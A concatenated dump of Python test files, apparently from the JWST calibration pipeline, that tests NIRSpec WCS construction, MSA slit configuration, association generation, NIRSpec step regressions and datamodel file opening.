import data\nfrom jwst.assign_wcs.util import MSAFileError\n\n\ndata_path = os.path.split(os.path.abspath(data.__file__))[0]\n\n\nwcs_kw = {'wcsaxes': 2, 'ra_ref': 165, 'dec_ref': 54,\n 'v2_ref': -8.3942412, 'v3_ref': -5.3123744, 'roll_ref': 37,\n 'crpix1': 1024, 'crpix2': 1024,\n 'cdelt1': .08, 'cdelt2': .08,\n 'ctype1': 'RA---TAN', 'ctype2': 'DEC--TAN',\n 'pc1_1': 1, 'pc1_2': 0, 'pc2_1': 0, 'pc2_2': 1\n }\n\n\nslit_fields_num = [\"shutter_id\", \"dither_position\", \"xcen\", \"ycen\",\n \"ymin\", \"ymax\", \"quadrant\", \"source_id\",\n \"stellarity\", \"source_xpos\", \"source_ypos\"]\n\n\nslit_fields_str = [\"name\", \"shutter_state\", \"source_name\", \"source_alias\"]\n\n\ndef _compare_slits(s1, s2):\n for f in slit_fields_num:\n assert_allclose(getattr(s1, f), getattr(s2, f))\n for f in slit_fields_str:\n assert getattr(s1, f) == getattr(s2, f)\n\n\ndef get_file_path(filename):\n \"\"\"\n Construct an absolute path.\n \"\"\"\n return os.path.join(data_path, filename)\n\n\ndef create_hdul(detector='NRS1'):\n \"\"\"\n Create a fits HDUList instance.\n \"\"\"\n hdul = fits.HDUList()\n phdu = fits.PrimaryHDU()\n phdu.header['instrume'] = 'NIRSPEC'\n phdu.header['detector'] = detector\n phdu.header['time-obs'] = '8:59:37'\n phdu.header['date-obs'] = '2016-09-05'\n\n scihdu = fits.ImageHDU()\n scihdu.header['EXTNAME'] = \"SCI\"\n for item in wcs_kw.items():\n scihdu.header[item[0]] = item[1]\n hdul.append(phdu)\n hdul.append(scihdu)\n return hdul\n\n\ndef create_reference_files(datamodel):\n \"\"\"\n Create a dict {reftype: reference_file}.\n \"\"\"\n refs = {}\n step = assign_wcs_step.AssignWcsStep()\n for reftype in assign_wcs_step.AssignWcsStep.reference_file_types:\n refs[reftype] = step.get_reference_file(datamodel, reftype)\n return refs\n\n\ndef create_nirspec_imaging_file():\n image = create_hdul()\n image[0].header['exp_type'] = 'NRS_IMAGE'\n image[0].header['filter'] = 'F290LP'\n image[0].header['grating'] = 'MIRROR'\n return image\n\n\ndef create_nirspec_mos_file():\n image = create_hdul()\n image[0].header['exp_type'] = 'NRS_MSASPEC'\n image[0].header['filter'] = 'F170LP'\n image[0].header['grating'] = 'G235M'\n image[0].header['PATT_NUM'] = 1\n\n msa_status_file = get_file_path('SPCB-GD-A.msa.fits.gz')\n image[0].header['MSACONFG'] = msa_status_file\n return image\n\n\ndef create_nirspec_ifu_file(filter, grating, lamp='N/A', detector='NRS1'):\n image = create_hdul(detector)\n image[0].header['exp_type'] = 'NRS_IFU'\n image[0].header['filter'] = filter\n image[0].header['grating'] = grating\n image[1].header['crval3'] = 0\n image[1].header['wcsaxes'] = 3\n image[1].header['ctype3'] = 'WAVE'\n image[0].header['lamp'] = lamp\n image[0].header['GWA_XTIL'] = 0.3318742513656616\n image[0].header['GWA_YTIL'] = 0.1258982867002487\n return image\n\n\ndef create_nirspec_fs_file(grating, filter, lamp=\"N/A\"):\n image = create_hdul()\n image[0].header['exp_type'] = 'NRS_FIXEDSLIT'\n image[0].header['filter'] = filter\n image[0].header['grating'] = grating\n image[0].header['lamp'] = lamp\n image[1].header['crval3'] = 0\n image[1].header['wcsaxes'] = 3\n image[1].header['ctype3'] = 'WAVE'\n image[0].header['GWA_XTIL'] = 0.3316612243652344\n image[0].header['GWA_YTIL'] = 0.1260581910610199\n image[0].header['SUBARRAY'] = \"FULL\"\n return image\n\n\ndef test_nirspec_imaging():\n \"\"\"\n Test Nirspec Imaging mode using build 6 reference files.\n \"\"\"\n #Test creating the WCS\n f = create_nirspec_imaging_file()\n im = datamodels.ImageModel(f)\n\n refs = create_reference_files(im)\n\n 
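# Note (added): nirspec.create_pipeline returns the (frame, transform) stages\n    # for this observing mode; gwcs.wcs.WCS chains them into a single callable\n    # transform from detector pixels to world coordinates.\n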
    pipe = nirspec.create_pipeline(im, refs, slit_y_range=[-.5, .5])\n    w = wcs.WCS(pipe)\n    im.meta.wcs = w\n    # Test evaluating the WCS\n    im.meta.wcs(1, 2)\n\n\ndef test_nirspec_ifu_against_esa():\n    \"\"\"\n    Test Nirspec IFU mode using CV3 reference files.\n    \"\"\"\n    ref = fits.open(get_file_path('Trace_IFU_Slice_00_SMOS-MOD-G1M-17-5344175105_30192_JLAB88.fits'))\n\n    # Test NRS1\n    pyw = astwcs.WCS(ref['SLITY1'].header)\n    hdul = create_nirspec_ifu_file(\"OPAQUE\", \"G140M\")\n    im = datamodels.ImageModel(hdul)\n    im.meta.filename = \"test_ifu.fits\"\n    refs = create_reference_files(im)\n\n    pipe = nirspec.create_pipeline(im, refs, slit_y_range=[-.5, .5])\n    w = wcs.WCS(pipe)\n    im.meta.wcs = w\n    # Test evaluating the WCS (slice 0)\n    w0 = nirspec.nrs_wcs_set_input(im, 0)\n\n    # get positions within the slit and the corresponding lambda\n    slit1 = ref['SLITY1'].data # y offset on the slit\n    lam = ref['LAMBDA1'].data\n    # filter out locations outside the slit\n    cond = np.logical_and(slit1 < .5, slit1 > -.5)\n    y, x = cond.nonzero() # 0-based\n\n    x, y = pyw.wcs_pix2world(x, y, 0)\n    # The pipeline accepts 0-based coordinates\n    x -= 1\n    y -= 1\n    sca2world = w0.get_transform('sca', 'msa_frame')\n    _, slit_y, lp = sca2world(x, y)\n\n    lp *= 10**-6\n    assert_allclose(lp, lam[cond], atol=1e-13)\n\n\ndef test_nirspec_fs_esa():\n    \"\"\"\n    Test Nirspec FS mode using build 6 reference files.\n    \"\"\"\n    # Test creating the WCS\n    filename = create_nirspec_fs_file(grating=\"G140M\", filter=\"F100LP\")\n    im = datamodels.ImageModel(filename)\n    im.meta.filename = \"test_fs.fits\"\n    refs = create_reference_files(im)\n\n    pipe = nirspec.create_pipeline(im, refs, slit_y_range=[-.5, .5])\n    w = wcs.WCS(pipe)\n    im.meta.wcs = w\n    # Test evaluating the WCS\n    w1 = nirspec.nrs_wcs_set_input(im, \"S200A1\")\n\n    ref = fits.open(get_file_path('Trace_SLIT_A_200_1_V84600010001P0000000002101_39547_JLAB88.fits'))\n    pyw = astwcs.WCS(ref[1].header)\n\n    # get positions within the slit and the corresponding lambda\n    slit1 = ref[5].data # y offset on the slit\n    lam = ref[4].data\n\n    # filter out locations outside the slit\n    cond = np.logical_and(slit1 < .5, slit1 > -.5)\n    y, x = cond.nonzero() # 0-based\n\n    x, y = pyw.wcs_pix2world(x, y, 0)\n    # The pipeline works with 0-based coordinates\n    x -= 1\n    y -= 1\n\n    sca2world = w1.get_transform('sca', 'v2v3')\n    ra, dec, lp = sca2world(x, y)\n    # w1 outputs wavelength in microns; the 1e-6 factor converts back to meters\n    lp *= 1e-6\n    lam = lam[cond]\n    nan_cond = ~np.isnan(lp)\n    assert_allclose(lp[nan_cond], lam[nan_cond], atol=10**-13)\n    ref.close()\n\n\ndef test_correct_tilt():\n    \"\"\"\n    Example provided by Catarina.\n    \"\"\"\n    disp = datamodels.DisperserModel()\n    xtilt = 0.35896975\n    ytilt = 0.1343827\n    # ztilt = None\n    corrected_theta_x = 0.02942671219861111\n    corrected_theta_y = 0.00018649006677464447\n    # corrected_theta_z = -0.2523269848788889\n    disp.gwa_tiltx = {'temperatures': [39.58],\n                      'tilt_model': astmodels.Polynomial1D(1, c0=3307.85402614,\n                                                           c1=-9182.87552123),\n                      'unit': 'arcsec',\n                      'zeroreadings': [0.35972327]}\n    disp.gwa_tilty = {'temperatures': [39.58],\n                      'tilt_model': astmodels.Polynomial1D(1, c0=0.0, c1=0.0),\n                      'unit': 'arcsec',\n                      'zeroreadings': [0.0]}\n    disp.meta = {'instrument': {'name': 'NIRSPEC', 'detector': 'NRS1'},\n                 'reftype': 'DISPERSER'}\n\n    disp.theta_x = 0.02942671219861111\n    disp.theta_y = -0.0007745488724972222\n    # disp.theta_z = -0.2523269848788889\n    disp.tilt_x = 0.0\n    disp.tilt_y = -8.8\n\n    disp_corrected = nirspec.correct_tilt(disp, xtilt, ytilt)#, ztilt)\n    assert np.isclose(disp_corrected.theta_x, 
corrected_theta_x)\n # assert(np.isclose(disp_corrected['theta_z'], corrected_theta_z))\n assert np.isclose(disp_corrected.theta_y, corrected_theta_y)\n\n\ndef test_msa_configuration_normal():\n \"\"\"\n Test the get_open_msa_slits function.\n \"\"\"\n\n # Test 1: Reasonably normal as well\n msa_meta_id = 12\n msaconfl = get_file_path('msa_configuration.fits')\n dither_position = 1\n slitlet_info = nirspec.get_open_msa_slits(msaconfl, msa_meta_id, dither_position,\n slit_y_range=[-.5, .5])\n ref_slit = Slit(55, 9376, 1, 251, 26, -5.15, 0.55, 4, 1, '1111x', '95065_1', '2122',\n 0.13, -0.31716078999999997, -0.18092266)\n _compare_slits(slitlet_info[0], ref_slit)\n\n\ndef test_msa_configuration_no_background():\n \"\"\"\n Test the get_open_msa_slits function.\n \"\"\"\n # Test 2: Two main shutters, not allowed and should fail\n msa_meta_id = 13\n msaconfl = get_file_path('msa_configuration.fits')\n dither_position = 1\n with pytest.raises(MSAFileError):\n nirspec.get_open_msa_slits(msaconfl, msa_meta_id, dither_position,\n slit_y_range=[-.5, .5])\n\n\ndef test_msa_configuration_all_background():\n \"\"\"\n Test the get_open_msa_slits function.\n \"\"\"\n\n # Test 3: No non-background, not acceptable.\n msa_meta_id = 14\n msaconfl = get_file_path('msa_configuration.fits')\n dither_position = 1\n slitlet_info = nirspec.get_open_msa_slits(msaconfl, msa_meta_id, dither_position,\n slit_y_range=[-.5, .5])\n ref_slit = Slit(57, 8646, 1, 251, 24, -2.85, .55, 4, 0, '11x', 'background_57', 'bkg_57',\n 0, -0.5, -0.5)\n _compare_slits(slitlet_info[0], ref_slit)\n\n\n\ndef test_msa_configuration_row_skipped():\n \"\"\"\n Test the get_open_msa_slits function.\n \"\"\"\n\n # Test 4: One row is skipped, should be acceptable.\n msa_meta_id = 15\n msaconfl = get_file_path('msa_configuration.fits')\n dither_position = 1\n slitlet_info = nirspec.get_open_msa_slits(msaconfl, msa_meta_id, dither_position,\n slit_y_range=[-.5, .5])\n ref_slit = Slit(58, 8646, 1, 251, 24, -2.85, 5.15, 4, 1, '11x1011', '95065_1', '2122',\n 0.130, -0.31716078999999997, -0.18092266)\n _compare_slits(slitlet_info[0], ref_slit)\n\n\ndef test_msa_configuration_multiple_returns():\n \"\"\"\n Test the get_open_msa_slits function.\n \"\"\"\n # Test 4: One row is skipped, should be acceptable.\n msa_meta_id = 16\n msaconfl = get_file_path('msa_configuration.fits')\n dither_position = 1\n slitlet_info = nirspec.get_open_msa_slits(msaconfl, msa_meta_id, dither_position,\n slit_y_range=[-.5, .5])\n ref_slit1 = Slit(59, 8651, 1, 256, 24, -2.85, 5.15, 4, 1, '11x1011', '95065_1', '2122',\n 0.13000000000000003, -0.31716078999999997, -0.18092266)\n ref_slit2 = Slit(60, 11573, 1, 258, 32, -2.85, 4, 4, 2, '11x111', '95065_2', '172',\n 0.70000000000000007, -0.31716078999999997, -0.18092266)\n _compare_slits(slitlet_info[0], ref_slit1)\n _compare_slits(slitlet_info[1], ref_slit2)\n\n\nopen_shutters = [[24], [23, 24], [22, 23, 25, 27], [22, 23, 25, 27, 28]]\nmain_shutter = [24, 23, 25, 28]\nresult = [\"x\", \"x1\", \"110x01\", \"110101x\"]\ntest_data = list(zip(open_shutters, main_shutter, result))\n\[email protected](('open_shutters', 'main_shutter', 'result'),\n test_data)\ndef test_shutter_state(open_shutters, main_shutter, result):\n shutter_state = nirspec._shutter_id_to_str(open_shutters, main_shutter)\n assert shutter_state == result\n\n\ndef test_slit_projection_on_detector():\n step = assign_wcs_step.AssignWcsStep()\n\n hdul = create_nirspec_fs_file(grating=\"G395M\", filter=\"OPAQUE\", lamp=\"ARGON\")\n hdul[0].header['DETECTOR'] = 'NRS2'\n im 
= datamodels.ImageModel(hdul)\n\n refs = {}\n for reftype in step.reference_file_types:\n refs[reftype] = step.get_reference_file(im, reftype)\n\n open_slits = nirspec.get_open_slits(im, refs)\n assert len(open_slits) == 1\n assert open_slits[0].name == \"S200B1\"\n\n hdul[0].header['DETECTOR'] = 'NRS1'\n im = datamodels.ImageModel(hdul)\n\n open_slits = nirspec.get_open_slits(im, refs)\n assert len(open_slits) == 4\n names = [s.name for s in open_slits]\n assert \"S200A1\" in names\n assert \"S200A2\" in names\n assert \"S400A1\" in names\n assert \"S1600A1\" in names\n\n\ndef test_missing_msa_file():\n image = create_nirspec_mos_file()\n model = datamodels.ImageModel(image)\n\n model.meta.instrument.msa_metadata_file = \"\"\n with pytest.raises(MSAFileError):\n assign_wcs_step.AssignWcsStep.call(model)\n\n model.meta.instrument.msa_metadata_file = \"missing.fits\"\n with pytest.raises(MSAFileError):\n assign_wcs_step.AssignWcsStep.call(model)\n\n\ndef test_open_slits():\n \"\"\" Test that get_open_slits works with MSA data.\n\n Issue #2321\n \"\"\"\n image = create_nirspec_mos_file()\n model = datamodels.ImageModel(image)\n msaconfl = get_file_path('msa_configuration.fits')\n\n model.meta.instrument.msa_metadata_file = msaconfl\n model.meta.instrument.msa_metadata_id = 12\n\n slits = nirspec.get_open_slits(model)\n assert len(slits) == 1\n\n\ndef test_shutter_size_on_sky():\n \"\"\"\n Test the size of a MOS shutter on sky is ~ .2 x .4 arcsec.\n \"\"\"\n image = create_nirspec_mos_file()\n model = datamodels.ImageModel(image)\n msaconfl = get_file_path('msa_configuration.fits')\n\n model.meta.instrument.msa_metadata_file = msaconfl\n model.meta.instrument.msa_metadata_id = 12\n\n refs = create_reference_files(model)\n\n pipe = nirspec.create_pipeline(model, refs, slit_y_range=(-.5, .5))\n w = wcs.WCS(pipe)\n model.meta.wcs = w\n slit = w.get_transform('slit_frame', 'msa_frame').slits[0]\n wslit = nirspec.nrs_wcs_set_input(model, slit.name)\n virtual_corners_x = [-.5, -.5, .5, .5, -.5]\n virtual_corners_y = [-.5, .5, .5, -.5, -.5]\n input_lam = [2e-6] * 5\n\n slit2world = wslit.get_transform('slit_frame', 'world')\n ra, dec, lam = slit2world(virtual_corners_x,\n virtual_corners_y,\n input_lam)\n sky = coords.SkyCoord(ra*u.deg, dec*u.deg)\n sep_x = sky[0].separation(sky[3]).to(u.arcsec)\n sep_y = sky[0].separation(sky[1]).to(u.arcsec)\n\n assert sep_x.value > 0.193\n assert sep_x.value < 0.194\n assert sep_y.value > 0.45\n assert sep_y.value < 0.46\n" }, { "alpha_fraction": 0.6375404596328735, "alphanum_fraction": 0.6407766938209534, "avg_line_length": 27.090909957885742, "blob_id": "d184fb5e431f08851757a963385d0559b01d4c59", "content_id": "f8c1ec5858b562c785bc9cf48410ee1ef63f2385", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 927, "license_type": "permissive", "max_line_length": 55, "num_lines": 33, "path": "/jwst/tests_nightly/general/associations/test_generate.py", "repo_name": "mperrin/jwst", "src_encoding": "UTF-8", "text": "\"\"\"Test general asn_generate operations\"\"\"\nimport pytest\n\nfrom jwst.associations import (\n generate,\n load_asn\n)\n\n\[email protected]\ndef test_generate(full_pool_rules):\n \"\"\"Run a full sized pool using all rules\"\"\"\n pool, rules, pool_fname = full_pool_rules\n asns = generate(pool, rules)\n assert len(asns) == 99\n for asn in asns:\n asn_name, asn_store = asn.dump()\n asn_table = load_asn(asn_store)\n schemas = rules.validate(asn_table)\n assert len(schemas) > 
0\n\n\[email protected]\ndef test_serialize(full_pool_rules):\n    \"\"\"Test serialization round-tripping\"\"\"\n    pool, rules, pool_fname = full_pool_rules\n    asns = generate(pool, rules)\n    for asn in asns:\n        for format in asn.ioregistry:\n            fname, serialized = asn.dump(format=format)\n            assert serialized is not None\n            recovered = load_asn(serialized)\n            assert recovered is not None\n" }, { "alpha_fraction": 0.40021929144859314, "alphanum_fraction": 0.48903509974479675, "avg_line_length": 45.598541259765625, "blob_id": "7f3d5bdeacc709ed53a41a24ea5f5d6eff860c81", "content_id": "8378f455db61bb13dcd7f78d3f67a3ed96e542af", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6384, "license_type": "permissive", "max_line_length": 86, "num_lines": 137, "path": "/jwst/tests_nightly/general/nirspec/test_nirspec_steps.py", "repo_name": "mperrin/jwst", "src_encoding": "UTF-8", "text": "import pytest\n\nfrom jwst.tests.base_classes import BaseJWSTTestSteps\nfrom jwst.tests.base_classes import pytest_generate_tests # noqa: F401\n\nfrom jwst.refpix import RefPixStep\nfrom jwst.dark_current import DarkCurrentStep\nfrom jwst.dq_init import DQInitStep\nfrom jwst.extract_1d import Extract1dStep\nfrom jwst.extract_2d import Extract2dStep\nfrom jwst.flatfield import FlatFieldStep\nfrom jwst.group_scale import GroupScaleStep\nfrom jwst.jump import JumpStep\nfrom jwst.linearity import LinearityStep\nfrom jwst.photom import PhotomStep\nfrom jwst.saturation import SaturationStep\nfrom jwst.superbias import SuperBiasStep\n\n\n# Parameterized regression tests for NIRSpec processing\n# All tests in this set run with 1 input file and\n# only generate 1 output for comparison.\n#\[email protected]\nclass TestNIRSpecSteps(BaseJWSTTestSteps):\n    input_loc = 'nirspec'\n\n    params = {'test_steps':\n              [dict(input='jw00023001001_01101_00001_NRS1_dq_init.fits',\n                    test_dir='test_bias_drift',\n                    step_class=RefPixStep,\n                    step_pars=dict(odd_even_columns=True,\n                                   use_side_ref_pixels=False,\n                                   side_smoothing_length=10,\n                                   side_gain=1.0),\n                    output_truth='jw00023001001_01101_00001_NRS1_bias_drift.fits',\n                    output_hdus=[],\n                    id='refpix_nirspec'\n                    ),\n               dict(input='jw00023001001_01101_00001_NRS1_saturation.fits',\n                    test_dir='test_dark_step',\n                    step_class=DarkCurrentStep,\n                    step_pars=dict(),\n                    output_truth='jw00023001001_01101_00001_NRS1_dark_current.fits',\n                    output_hdus=[],\n                    id='dark_current_nirspec'\n                    ),\n               dict(input='jw00023001001_01101_00001_NRS1_uncal.fits',\n                    test_dir='test_dq_init',\n                    step_class=DQInitStep,\n                    step_pars=dict(),\n                    output_truth='jw00023001001_01101_00001_NRS1_dq_init.fits',\n                    output_hdus=[],\n                    id='dq_init_nirspec'\n                    ),\n               dict(input='jw00023001001_01101_00001_NRS1_cal.fits',\n                    test_dir='test_extract_1d',\n                    step_class=Extract1dStep,\n                    step_pars=dict(),\n                    output_truth='jw00023001001_01101_00001_NRS1_spec.fits',\n                    output_hdus=[],\n                    id='extract1d_nirspec'\n                    ),\n               dict(input='jw00023001001_01101_00001_NRS1_assign_wcs.fits',\n                    test_dir='test_extract_2d',\n                    step_class=Extract2dStep,\n                    step_pars=dict(),\n                    output_truth='jw00023001001_01101_00001_NRS1_extract_2d.fits',\n                    output_hdus=[],\n                    id='extract2d_nirspec'\n                    ),\n               dict(input='jw00023001001_01101_00001_NRS1_extract_2d.fits',\n                    test_dir='test_flat_field',\n                    step_class=FlatFieldStep,\n                    step_pars=dict(save_interpolated_flat=True),\n                    output_truth='jw00023001001_01101_00001_NRS1_flat_field.fits',\n                    output_hdus=[],\n                    id='flat_field_nirspec'\n                    ),\n               dict(input='NRSIRS2_230_491_uncal.fits',\n                    test_dir='test_group_scale',\n
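                    # Note (added): GroupScaleStep rescales grouped data when on-board\n                    # frame averaging used a divisor (FRMDIVSR) different from the\n                    # number of averaged frames (NFRAMES).\n                    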
step_class=GroupScaleStep,\n step_pars=dict(),\n output_truth='NRSIRS2_230_491_groupscale.fits',\n output_hdus=[],\n id='group_scale_nirspec'\n ),\n dict(input='jw00023001001_01101_00001_NRS1_linearity.fits',\n test_dir='test_jump',\n step_class=JumpStep,\n step_pars=dict(rejection_threshold=50.0),\n output_truth='jw00023001001_01101_00001_NRS1_jump.fits',\n output_hdus=[],\n id='jump_nirspec'\n ),\n dict(input='jw00023001001_01101_00001_NRS1_dark_current.fits',\n test_dir='test_linearity',\n step_class=LinearityStep,\n step_pars=dict(),\n output_truth='jw00023001001_01101_00001_NRS1_linearity.fits',\n output_hdus=[],\n id='linearity_nirspec'\n ),\n dict(input='jw00023001001_01101_00001_NRS1_flat_field.fits',\n test_dir='test_photom',\n step_class=PhotomStep,\n step_pars=dict(),\n output_truth='jw00023001001_01101_00001_NRS1_photom.fits',\n output_hdus=[],\n id='photom_nirspec'\n ),\n dict(input='jw84600007001_02101_00001_nrs1_superbias.fits',\n test_dir='test_bias_drift',\n step_class=RefPixStep,\n step_pars=dict(),\n output_truth='jw84600007001_02101_00001_nrs1_refpix.fits',\n output_hdus=[],\n id='refpix_nirspec_irs2'\n ),\n dict(input='jw00023001001_01101_00001_NRS1_bias_drift.fits',\n test_dir='test_saturation',\n step_class=SaturationStep,\n step_pars=dict(),\n output_truth='jw00023001001_01101_00001_NRS1_saturation.fits',\n output_hdus=[],\n id='saturation_nirspec'\n ),\n dict(input='jw00011001001_01106_00001_NRS2_saturation.fits',\n test_dir='test_superbias',\n step_class=SuperBiasStep,\n step_pars=dict(),\n output_truth='jw00011001001_01106_00001_NRS2_superbias.fits',\n output_hdus=[],\n id='superbias_nirspec'\n )\n ]\n }\n" }, { "alpha_fraction": 0.64786696434021, "alphanum_fraction": 0.6619667410850525, "avg_line_length": 35.394737243652344, "blob_id": "e0e24d396fcf48db85ac7308f81c5331042fd620", "content_id": "0558a1e0bce2871d8b57b292c0880a48dbeb921c", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2766, "license_type": "permissive", "max_line_length": 89, "num_lines": 76, "path": "/jwst/tests_nightly/general/associations/test_main.py", "repo_name": "mperrin/jwst", "src_encoding": "UTF-8", "text": "\"\"\"test_associations: Test of general Association functionality.\"\"\"\nimport re\n\nimport pytest\n\nfrom jwst.associations.main import Main\n\n\[email protected](\n reason='Takes too long and is not currently contributing to any actual testing'\n)\[email protected]\ndef test_script(full_pool_rules):\n \"\"\"Test full run of the script code\"\"\"\n pool, rules, pool_fname = full_pool_rules\n\n ref_rule_set = {\n 'candidate_Asn_Coron', 'discover_Asn_TSO', 'candidate_Asn_Lv2NRSFSS',\n 'candidate_Asn_SpectralTarget', 'candidate_Asn_TSO', 'candidate_Asn_WFSCMB',\n 'candidate_Asn_Lv2SpecSpecial', 'candidate_Asn_Image', 'candidate_Asn_IFU',\n 'candidate_Asn_Lv2NRSMSA', 'candidate_Asn_Lv2Image', 'candidate_Asn_Lv2Spec',\n 'discover_Asn_AMI', 'candidate_Asn_AMI', 'candidate_Asn_Lv2ImageSpecial',\n 'candidate_Asn_Lv2SpecTSO', 'candidate_Asn_SpectralSource',\n 'candidate_Asn_Lv2WFSS', 'discover_Asn_Coron', 'candidate_Asn_WFSS_NIS',\n 'discover_Asn_IFU', 'candidate_Asn_Lv2WFSC',\n 'candidate_Asn_Lv2ImageNonScience', 'discover_Asn_SpectralTarget',\n 'candidate_Asn_Lv2ImageTSO', 'discover_Asn_SpectralSource',\n 'discover_Asn_Image', 'candidate_Asn_Lv2FGS', 'candidate_Asn_Lv3SpecAux'\n }\n\n generated = Main([pool_fname, '--dry-run'])\n asns = generated.associations\n assert len(asns) == 938\n assert 
len(generated.orphaned) == 61\n found_rules = set(\n asn['asn_rule']\n for asn in asns\n )\n assert ref_rule_set == found_rules\n\n\[email protected]\ndef test_asn_candidates(full_pool_rules):\n \"\"\"Test basic candidate selection\"\"\"\n pool, rules, pool_fname = full_pool_rules\n\n generated = Main([pool_fname, '--dry-run', '-i', 'o001'])\n assert len(generated.associations) == 12\n generated = Main([pool_fname, '--dry-run', '-i', 'o001', 'o002'])\n assert len(generated.associations) == 24\n\n\[email protected]\ndef test_version_id(full_pool_rules):\n \"\"\"Test that version id is properly included\"\"\"\n pool, rules, pool_fname = full_pool_rules\n\n generated = Main([pool_fname, '--dry-run', '-i', 'o001', '--version-id'])\n regex = re.compile(r'\\d{3}t\\d{6}')\n for asn in generated.associations:\n assert regex.search(asn.asn_name)\n\n version_id = 'mytestid'\n generated = Main([pool_fname, '--dry-run', '-i', 'o001', '--version-id', version_id])\n for asn in generated.associations:\n assert version_id in asn.asn_name\n\n\[email protected]\ndef test_pool_as_parameter(full_pool_rules):\n \"\"\"Test passing the pool as an object\"\"\"\n pool, rules, pool_fname = full_pool_rules\n\n full = Main([pool_fname, '--dry-run'])\n full_as_param = Main(['--dry-run'], pool=pool)\n assert len(full.associations) == len(full_as_param.associations)\n" }, { "alpha_fraction": 0.6159745454788208, "alphanum_fraction": 0.6247661709785461, "avg_line_length": 29.20339012145996, "blob_id": "89715acf41e8305e9227caf4b4e5518f39697e89", "content_id": "b7e1359c95b40fada42d4396f2a3c443690da8b8", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5346, "license_type": "permissive", "max_line_length": 75, "num_lines": 177, "path": "/jwst/datamodels/tests/test_open.py", "repo_name": "mperrin/jwst", "src_encoding": "UTF-8", "text": "\"\"\"\nTest datamodel.open\n\"\"\"\n\nimport os\nimport os.path\nimport warnings\n\nimport pytest\nimport numpy as np\nfrom astropy.io import fits\n\nfrom jwst.datamodels import (DataModel, ModelContainer, ImageModel,\n ReferenceFileModel, ReferenceImageModel, ReferenceCubeModel,\n ReferenceQuadModel, FlatModel, MaskModel, NrcImgPhotomModel, GainModel,\n ReadnoiseModel, DistortionModel)\nfrom jwst import datamodels\n\n\ndef test_open_fits():\n \"\"\"Test opening a model from a FITS file\"\"\"\n\n with warnings.catch_warnings():\n warnings.filterwarnings(\"ignore\", \"model_type not found\")\n fits_file = t_path('test.fits')\n with datamodels.open(fits_file) as model:\n assert isinstance(model, DataModel)\n\n\ndef test_open_fits_s3(s3_root_dir):\n \"\"\"Test opening a model from a FITS file on S3\"\"\"\n path = str(s3_root_dir.join(\"test.fits\"))\n with DataModel() as dm:\n dm.save(path)\n\n with datamodels.open(\"s3://test-s3-data/test.fits\") as m:\n assert isinstance(m, DataModel)\n\n\ndef test_open_asdf_s3(s3_root_dir):\n \"\"\"Test opening a model from an ASDF file on S3\"\"\"\n path = str(s3_root_dir.join(\"test.asdf\"))\n with DataModel() as dm:\n dm.save(path)\n\n with datamodels.open(\"s3://test-s3-data/test.asdf\") as m:\n assert isinstance(m, DataModel)\n\n\ndef test_open_association():\n \"\"\"Test for opening an association\"\"\"\n\n asn_file = t_path('association.json')\n with warnings.catch_warnings():\n warnings.filterwarnings(\"ignore\", \"model_type not found\")\n with datamodels.open(asn_file) as c:\n assert isinstance(c, ModelContainer)\n for model in c:\n assert model.meta.asn.table_name == 
\"association.json\"\n assert model.meta.asn.pool_name == \"pool\"\n\n\ndef test_container_open_asn_with_sourcecat():\n path = t_path(\"association_w_cat.json\")\n with datamodels.open(path, asn_exptypes=\"science\") as c:\n for model in c:\n assert model.meta.asn.table_name == \"association_w_cat.json\"\n\n\ndef test_open_shape():\n init = (200, 200)\n with datamodels.open(init) as model:\n assert type(model) == ImageModel\n\n\ndef test_open_illegal():\n with pytest.raises(ValueError):\n init = 5\n datamodels.open(init)\n\n\ndef test_open_hdulist():\n hdulist = fits.HDUList()\n data = np.empty((50, 50), dtype=np.float32)\n primary = fits.PrimaryHDU()\n hdulist.append(primary)\n science = fits.ImageHDU(data=data, name='SCI')\n hdulist.append(science)\n\n with datamodels.open(hdulist) as model:\n assert type(model) == ImageModel\n\n\ndef test_open_image():\n with warnings.catch_warnings():\n warnings.filterwarnings(\"ignore\", \"model_type not found\")\n image_name = t_path('jwst_image.fits')\n with datamodels.open(image_name) as model:\n assert type(model) == ImageModel\n\n\ndef test_open_reference_files():\n files = {'nircam_flat.fits' : FlatModel,\n 'nircam_mask.fits' : MaskModel,\n 'nircam_photom.fits' : NrcImgPhotomModel,\n 'nircam_gain.fits' : GainModel,\n 'nircam_readnoise.fits' : ReadnoiseModel}\n\n with warnings.catch_warnings():\n warnings.filterwarnings(\"ignore\", \"model_type not found\")\n for base_name, klass in files.items():\n file = t_path(base_name)\n model = datamodels.open(file)\n if model.shape:\n ndim = len(model.shape)\n else:\n ndim = 0\n\n if ndim == 0:\n my_klass = ReferenceFileModel\n elif ndim == 2:\n my_klass = ReferenceImageModel\n elif ndim == 3:\n my_klass = ReferenceCubeModel\n elif ndim == 4:\n my_klass = ReferenceQuadModel\n else:\n my_klass = None\n\n assert isinstance(model, my_klass)\n model.close()\n\n model = klass(file)\n assert isinstance(model, klass)\n model.close()\n\n\ndef test_open_fits_readonly(tmpdir):\n \"\"\"Test opening a FITS-format datamodel that is read-only on disk\"\"\"\n tmpfile = str(tmpdir.join('readonly.fits'))\n data = np.arange(100, dtype=np.float).reshape(10, 10)\n\n with ImageModel(data=data) as model:\n model.meta.telescope = 'JWST'\n model.meta.instrument.name = 'NIRCAM'\n model.meta.instrument.detector = 'NRCA4'\n model.meta.instrument.channel = 'SHORT'\n model.save(tmpfile)\n\n os.chmod(tmpfile, 0o440)\n assert os.access(tmpfile, os.W_OK) == False\n\n with datamodels.open(tmpfile) as model:\n assert model.meta.telescope == 'JWST'\n\n\ndef test_open_asdf_readonly(tmpdir):\n tmpfile = str(tmpdir.join('readonly.asdf'))\n\n with DistortionModel() as model:\n model.meta.telescope = 'JWST'\n model.meta.instrument.name = 'NIRCAM'\n model.meta.instrument.detector = 'NRCA4'\n model.meta.instrument.channel = 'SHORT'\n model.save(tmpfile)\n\n os.chmod(tmpfile, 0o440)\n assert os.access(tmpfile, os.W_OK) == False\n\n with datamodels.open(tmpfile) as model:\n assert model.meta.telescope == 'JWST'\n\n# Utilities\ndef t_path(partial_path):\n \"\"\"Construction the full path for test files\"\"\"\n test_dir = os.path.join(os.path.dirname(__file__), 'data')\n return os.path.join(test_dir, partial_path)\n" 